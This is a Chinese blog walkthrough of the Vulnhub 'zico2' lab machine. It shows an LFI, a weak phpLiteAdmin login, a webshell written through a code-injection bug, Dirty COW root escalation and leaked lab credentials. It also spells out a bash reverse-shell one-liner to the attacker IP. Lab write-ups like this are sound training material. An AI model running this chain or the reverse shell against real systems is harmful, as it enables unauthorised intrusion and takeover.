Vulnhub靶场渗透-zico2

最新推荐文章于 2023-03-25 15:31:14 发布
最新推荐文章于 2023-03-25 15:31:14 发布
阅读量1.2k 收藏 2
点赞数 3
分类专栏: Vulnhub渗透靶场学习 文章标签: kali linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/120581818
版权

前言

靶机ip(192.168.110.128)
攻击机ip(192.168.110.127)
网络NAT模式

这段时间一直在忙别的事,有两个礼拜没有学习了,哈哈哈

信息收集

在这里插入图片描述
打开网站每个页面都简单看了看,发现一个很明显的LFI,先记录下来肯定能用上
在这里插入图片描述
继续看就没有什么东西了,网页功能也比较简单,现在再来扫一下目录
在这里插入图片描述
很明显是数据库,手试了一波弱口令给我进去了,就是admin
在这里插入图片描述
在这里插入图片描述

漏洞挖掘

简单说一下
phpliteadmin 其实就是一个类似于 phpmyadmin的一个数据库管理工具
注意他的版本,这个版本是存在 php远程代码执行漏洞的
-----参考链接----
在这里插入图片描述
在这里插入图片描述
root:34kroot34
zico:zico2215@
尝试用 ssh 连接不行,会被检验

利用 phpliteadmin 写入一句话,正好可以利用最开始发现的文件包含来执行代码拿shell,就很舒服
数据库名我就叫 caidao.php
在这里插入图片描述
echo "bash -i >& /dev/tcp/192.168.110.127/2333 0>&1" | bash URL编码一下直接弹 shell
在这里插入图片描述
在这里插入图片描述
在 zico 用户下发现 WordPress,打开配置文件发现了一串密码
在这里插入图片描述
在这里插入图片描述
再次尝试 ssh 连接成功了
在这里插入图片描述
查看系统内核,尝试脏牛提权,具体怎么提权就不多说了,都是常规操作,可以看看我的这篇文章
-----------脏牛提权--------
在这里插入图片描述
这个时候 root 用户已经变成了我们这个
在这里插入图片描述
直接拿 flag
在这里插入图片描述

总结

又是老套路了,拿到shell然后脏牛提权拿 root,可见脏牛有多出名
在实战中也还是有很多老机器是运行着旧版本的linux且没有打补丁,所以懂的都懂,哈哈哈

paidx0
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
Vulnhub靶机渗透zico2
realmels的博客
07-04 585
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub之Me and My Girlfriend XSS漏洞 文件上传漏洞 文件上传绕过.
vulnhub渗透系列之zico2(内含zip提权和脏牛提权)
来到了学渣的博客
02-02 2125
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 我这个靶机总结了两种反弹shell和两种提权的方法(python反shell和zip提权、php反shell和 脏牛提权)并且有我错误的经验。希望能帮助到你们 实验过程总结 1.探测发现开放端口22、80、111端口,发现页面存在文件包含漏洞,dirb目...
Vulnhub靶机zico2渗透
xingjinhao123的博客
02-27 336
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/zico2-1,210/ 目标是获取root的目录下的flag,难度是中级 运行环境: 靶机:网络设为NAT模式,IP地址为:192.168.174.133 攻击机:同网段下的kali Linux,IP地址为:192.168.174.128 运行靶机 开始渗透 获取IP地址 扫描端口 访问80端口,跳转到view.php URL里面有参数怀疑是SQL注入或者是文件包含 使用工具扫描发现确实存在目录遍历的漏洞,并
VulnHub渗透测试实战靶场 - ZICO2: 1
LYJ20010728的博客
08-07 644
VulnHub渗透测试实战靶场 - ZICO2: 1环境下载ZICO2: 1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权补充 环境下载 戳此进行环境下载 ZICO2: 1靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualBox的Host-only 渗透测试 信息搜集 先用arp-scan扫描一下网段内目标靶机的IP地址
Vulnhub-Zico2靶机实战
御七彩虹猫
03-24 3136
Vulnhub-Zico2靶机实战
VMware的Zico2虚拟机
05-12
VMware的Zico2虚拟机
Zico-Shop.xmind
11-25
Zico-Shop.xmind
Zoomla!逐浪CMS2 x3.9.6.zip
07-16
5、升级:zico升级到v1.5,增加医疗行业图标。 6、修复:内容列表--如节点未允许内容页生成,则不会显示生成按钮 7、改进:内容发布过渡页效果 8、修复:内容列表--生成Html BUG,生成发布时,过滤未审核内容 9、增加:...
Acme-2zicon:Acme-2zicon 的只读发布历史
07-02
名称Acme::2zicon - 这是新的 $module概要 use Acme::2zicon;my $nizicon = Acme::2zicon->new;# retrieve the members on their activitiesmy @members = $nizicon->members;...Creates and returns a new Acme::2zico
Vulnhub:Zico2靶机
qq_43884092的博客
03-25 148
view.php测试出文件包含,dbadmin目录存在phpliteadmin,搜索该cms,发现该版本存在代码注入,通过弱口令admin进入phpliteadmin后台,写入一句话,在/home/zico/wordpress/wp-config.php发现zico用户的密码
vulnhub - zico2(考点: LFI & phpliteadmin & tar/zip 提权 & 版本提权)
冬萍子癸水
04-26 544
https://www.vulnhub.com/entry/zico2-1,210/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap 很常规,22想到可能的ssh登录,80是进web搜集信息 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-...
(Vulnhub练习)-- Zico2渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-21 454
(Vulnhub练习)-- Zico2渗透实战 Zico2渗透实战 下载地址 http://www.vulnhub.com/entry/zico2-1,210/ 此文章是参照大佬橘子女侠的文章写的 以下为我跟着他的文章整理的笔记 主机发现 sudo netdiscover -i eth0 -r 192.168.100.0/24 目标主机IP:192.168.100.153 端口扫描 sudo nmap -A 192.168.100.153 指纹识别 whatweb 192.168.100.153
vulnhub zico2 靶场练习
鸥鹭忘机
12-22 3375
前言 这次练习的靶机是vulnhub平台的zico2。下载地址为:https://www.vulnhub.com/entry/zico2-1,210/。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击zico2靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 收集信息 通过arp协议扫描局域网,又快又准,但是只能扫描局域网内的ip。 arp-scan -l 发现靶机的IP地址为 `192.168.
【甄选靶场Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权)
人间体佐菲的博客
10-01 738
【甄选靶场Vulnhub百个项目渗透——项目二十八:zico2-1(目录遍历,sqlite数据库写入,脏牛提权) 信息安全,网络安全渗透测试
Vulnhub实战:zico2
qq_24033605的博客
08-12 234
描述: 收集信息: 靶机开放了三个端口,ssh,http,rpc。 先进入80端口进行查看。 发现个文件包含漏洞。 尝试读取passwd文件 成功读取后,进行目录扫描。 找到了几个目录,看着dbadmin像是后台数据库,查看一下 尝试了几个弱密码,是admin 查看数据库发现两个用户信息,一个是root,一个是zico,md5爆破密码。 尝试ssh登录,发现密码不对,返回去找了个phpliteadmin的漏洞。 按照上述步骤,创建数据库,创建表,将一句话木马写入。 成功写入,
VULNHUB靶机渗透——ZICO2:1
aarong的博客
12-15 1060
渗透测试中使用的工具有Arp-scan(获取IP)、Nmap(获取目标开放端口和服务信息)、Dirb(网站目录爆破工具)、Zap(漏洞扫描工具)、在线密文破解工具等等。 \1) arp-scan扫描 NAT模式下,arp-scan扫描出靶机的IP:192.168.65.134 \2) Nmap扫描 获取开放端口及服务的全部信息 浏览器打开开启的网站 界面如下,是一个网络购物平台的网站。 \3) Dirb爆破 命令:dirb http://192.168.65.134 爆破结果发现类似于数
No.28-VulnHub-zico2: 1-Walkthrough渗透学习
qq_34801745的博客
01-23 1549
** VulnHub-zico2: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/zico2-1,210/ 靶机难度:中级(CTF) 靶机发布日期:2017年6月19日 靶机描述: Zico试图建立自己的网站,但在选择要使用的CMS时遇到了一些麻烦。在尝试了一些受欢迎的方法后,他决定建立自己的方法。那是个好主意吗? 提示:枚举,枚举和枚举!...
zico2靶机
薛定谔嘚喵博客
03-19 343
文件包含,远程php代码执行漏洞,一句话木马
Cannot read properties of undefined (reading 'gotoPage')
最新发布
09-01
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值